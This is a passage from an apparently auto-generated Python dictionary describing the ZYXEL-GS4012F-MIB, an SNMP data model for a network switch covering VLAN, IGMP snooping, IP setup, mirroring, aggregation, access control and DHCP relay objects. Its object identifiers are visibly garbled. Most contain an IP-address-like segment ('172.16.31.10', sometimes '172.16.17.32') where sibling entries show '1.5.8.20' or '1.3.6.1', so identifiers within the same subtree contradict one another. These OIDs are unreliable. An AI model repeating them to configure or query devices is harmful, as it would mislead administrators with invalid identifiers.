The various bit positions are:
0 sysAlarmDetected
1 sysTemperatureError
2 sysFanRPMError
3 sysVoltageRangeError""",
}, # scalar
"sysMgmtCPUUsage" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Show device CPU load in %, it's the snapshot of CPU load when
getting the values.""",
}, # scalar
"sysMgmtCounterReset" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enable" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disable" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""Reset all port counters.""",
}, # scalar
"sysMgmtTftpServiceSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.10",
}, # node
"sysMgmtTftpServerIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.10.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
""" IP address of TFTP server""",
}, # scalar
"sysMgmtTftpRemoteFileName" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.12.10.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""The file name that you want to backup to or restore from TFTP server""",
}, # scalar
"layer2Setup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13",
}, # node
"vlanTypeSetup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dot1Q" : {
"nodetype" : "namednumber",
"number" : "1"
},
"port_based" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpSnoopingStateSetup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"tagVlanPortIsolationState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"stpState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpFilteringStateSetup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"unknownMulticastFrameForwarding" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"flooding" : {
"nodetype" : "namednumber",
"number" : "1"
},
"drop" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"multicastGrpHostTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Specify host timeout for all multicast groups when the specific port is in auto mode.""",
}, # scalar
"multicastGrpLeaveTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Specify leave timeout for all multicast groups.""",
}, # scalar
"reservedMulticastFrameForwarding" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.9",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"flooding" : {
"nodetype" : "namednumber",
"number" : "1"
},
"drop" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpsnp8021pPriority" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Set the 802.1p priority of control messages for igmp-snooping(0~8, 8-No Change)""",
}, # scalar
"igmpsnpVlanMode" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.11",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"auto" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fixed" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"stpMode" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.12",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"rstp" : {
"nodetype" : "namednumber",
"number" : "1"
},
"mrstp" : {
"nodetype" : "namednumber",
"number" : "2"
},
"mstp" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"igmpsnpVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.13",
"status" : "current",
"description" :
"""""",
}, # table
"igmpsnpVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.13.1",
"create" : "true",
"status" : "current",
"linkage" : [
"igmpsnpVid",
],
"description" :
"""An entry in IgmpsnpVlanTable.""",
}, # row
"igmpsnpVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.13.13.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpsnpVlanName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.13.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"igmpsnpVlanRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.13.13.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ipSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14",
}, # node
"dnsIpAddress" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.14.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmt" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"in_band" : {
"nodetype" : "namednumber",
"number" : "0"
},
"out_of_band" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultGateway" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"outOfBandIpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4",
}, # node
"outOfBandIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"outOfBandSubnetMask" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"outOfBandGateway" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"maxNumOfInbandIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"inbandIpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6",
"status" : "current",
"description" :
"""""",
}, # table
"inbandIpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1",
"create" : "true",
"status" : "current",
"linkage" : [
"inbandEntryIp",
"inbandEntrySubnetMask",
],
"description" :
"""An entry in inbandIpTable.""",
}, # row
"inbandEntryIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"inbandEntrySubnetMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"inbandEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"inbandEntryRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15",
}, # node
"filterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1",
"status" : "current",
"description" :
"""""",
}, # table
"filterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1",
"create" : "true",
"status" : "current",
"linkage" : [
"filterMacAddr",
"filterVid",
],
"description" :
"""An entry in filterTable.""",
}, # row
"filterName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterActionState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"discard_source" : {
"nodetype" : "namednumber",
"number" : "1"
},
"discard_destination" : {
"nodetype" : "namednumber",
"number" : "2"
},
"both" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterMacAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"filterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"filterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16",
}, # node
"mirrorState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorMonitorPort" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3",
"status" : "current",
"description" :
"""""",
}, # table
"mirrorEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in mirrorTable.""",
}, # row
"mirrorMirroredState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorDirection" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"ingress" : {
"nodetype" : "namednumber",
"number" : "0"
},
"egress" : {
"nodetype" : "namednumber",
"number" : "1"
},
"both" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.17",
}, # node
"aggrState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"aggrSystemPriority" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"aggrGroupTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3",
"status" : "current",
"description" :
"""""",
}, # table
"aggrGroupEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1",
"status" : "current",
"linkage" : [
"aggrGroupIndex",
],
"description" :
"""An entry in aggrGroupTable.""",
}, # row
"aggrGroupIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"aggrGroupState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrGroupDynamicState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.4",
"status" : "current",
"description" :
"""""",
}, # table
"aggrPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.4.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in aggrPortTable.""",
}, # row
"aggrPortGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.17.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"t1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"t2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"t3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"t4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"t5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"t6" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrPortDynamicStateTimeout" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accessCtlSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18",
}, # node
"accessCtlTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1",
"status" : "current",
"description" :
"""""",
}, # table
"accessCtlEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1",
"status" : "current",
"linkage" : [
"accessCtlService",
],
"description" :
"""An entry in accessCtlTable.""",
}, # row
"accessCtlService" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"telnet" : {
"nodetype" : "namednumber",
"number" : "1"
},
"ssh" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ftp" : {
"nodetype" : "namednumber",
"number" : "3"
},
"http" : {
"nodetype" : "namednumber",
"number" : "4"
},
"https" : {
"nodetype" : "namednumber",
"number" : "5"
},
"icmp" : {
"nodetype" : "namednumber",
"number" : "6"
},
"snmp" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"accessCtlEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accessCtlServicePort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accessCtlTimeout" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.18.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2",
"status" : "current",
"description" :
"""""",
}, # table
"securedClientEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1",
"status" : "current",
"linkage" : [
"securedClientIndex",
],
"description" :
"""An entry in securedClientTable.""",
}, # row
"securedClientIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"securedClientEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientStartIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientEndIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientService" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"telnet" : {
"nodetype" : "namednumber",
"number" : "0"
},
"ftp" : {
"nodetype" : "namednumber",
"number" : "1"
},
"http" : {
"nodetype" : "namednumber",
"number" : "2"
},
"icmp" : {
"nodetype" : "namednumber",
"number" : "3"
},
"snmp" : {
"nodetype" : "namednumber",
"number" : "4"
},
"ssh" : {
"nodetype" : "namednumber",
"number" : "5"
},
"https" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"queuingMethodSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19",
}, # node
"portQueuingMethodTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19.1",
"status" : "current",
"description" :
"""""",
}, # table
"portQueuingMethodEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
"portQueuingMethodQueue",
],
"description" :
"""An entry in portQueuingMethodTable.""",
}, # row
"portQueuingMethodQueue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.19.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""0...7""",
}, # column
"portQueuingMethodWeight" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0...15""",
}, # column
"dhcpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20",
}, # node
"globalDhcpRelay" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1",
}, # node
"globalDhcpRelayEnable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"globalDhcpRelayOption82Enable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.20.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"globalDhcpRelayInfoEnable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.20.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"globalDhcpRelayInfoData" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"maxNumberOfGlobalDhcpRelayRemoteServer" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"globalDhcpRelayRemoteServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.1.6",
"status" : "current",
"description" :
"""""",
}, # table
"globalDhcpRelayRemoteServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
